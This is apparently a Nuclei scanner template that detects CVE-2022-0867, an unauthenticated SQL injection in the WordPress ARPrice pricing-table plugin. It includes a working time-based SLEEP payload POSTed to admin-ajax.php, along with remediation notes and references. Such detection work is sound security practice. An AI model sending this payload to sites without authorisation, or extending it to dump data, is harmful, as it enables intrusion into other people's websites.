id: CVE-2022-0867 info: name: WordPress ARPrice <3.6.1 - SQL Injection author: theamanrawat severity: critical description: | WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Update to the latest version of ARPrice plugin (3.6.1) or apply the vendor-provided patch. reference: - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494 - https://wordpress.org/plugins/arprice-responsive-pricing-table/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0867 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0867 cwe-id: CWE-89 epss-score: 0.05163 epss-percentile: 0.92084 cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: reputeinfosystems product: pricing_table framework: wordpress tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve http: - raw: - | @timeout: 10s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic) - | GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code_1 == 200' - 'contains(content_type_1, "text/html")' - 'contains(body_2, "ArpPriceTable")' condition: and # digest: 490a0046304402203fedaae79827a2615b957db8e4c8c1725dbb104963311f2eed73714e009e051c02202026fafd631b7fa05e03ea2be8b697391991c54a8848e2bc5e1a0837c385c221:922c64590222798bb761d5b6d8e72950